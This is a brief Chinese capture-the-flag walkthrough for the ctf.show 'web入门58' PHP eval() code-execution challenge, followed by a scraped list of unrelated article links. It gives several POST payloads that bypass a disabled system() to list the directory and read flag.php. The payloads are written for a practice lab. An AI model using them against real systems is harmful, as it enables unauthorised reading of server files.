ctf show web入门58

这是一道远程代码执行漏洞,我们先查看源代码

发现这里是使用POST方式传参给$c,再通过eval()函数来执行输入的内容

我们可以打开hackbar来进行POST提交

这里提示我们system()函数被禁用了,我们尝试其他命令

我们可以用 scandir() 函数来读取目录,并用 print_r() 或 var_dump() 打印出来

发现有一个flag.php我们尝试查看该目录中的内容

c=echo file_get_contents('flag.php');

c=highlight_file('flag.php');

c=readfile('flag.php');

c=show_source('flag.php');

相关推荐
上海魁鲸科技有限公司11 小时前
APS高级排产系统到底有什么用?一文讲清功能、选型与落地建议
前端·microsoft·excel
陈随易11 小时前
Bun v1.4 更新总结:把浏览器、图片、定时任务和工程工具都装进一个运行时
前端·后端·程序员
树的枝12 小时前
【STM32】03.中断和EXTI外设
笔记·stm32·单片机·嵌入式硬件
Wang's Blog12 小时前
PostgreSQL笔记34:索引优化策略全景解析——从B-tree到HOT的核心原理与实践
数据库·笔记·postgresql
金字塔頂の蝸牛12 小时前
商务日语口语实用手册
笔记·学习笔记·日语·外语
东风破_13 小时前
TypeScript 高级类型进阶:keyof、Exclude、Record 与类型组合思想
前端·后端·typescript
HwJack2013 小时前
UIAbility 生命周期全链路:从冷启动到热启动的实战笔记
笔记·华为·harmonyos
DS随心转插件13 小时前
Grok生成的html怎么导出——AI导出鸭:大模型结构化输出的“最后一公里”工程化解构
前端·人工智能·ai·html·豆包·deepseek·ai导出鸭
九硕智慧建筑一体化厂家13 小时前
直流智能照明|全场景节能升级!打造安全低碳的智慧建筑光环境
运维·笔记·安全·智慧城市
এ慕ོ冬℘゜13 小时前
使用 jQuery 动态渲染表格与状态切换
前端·javascript·jquery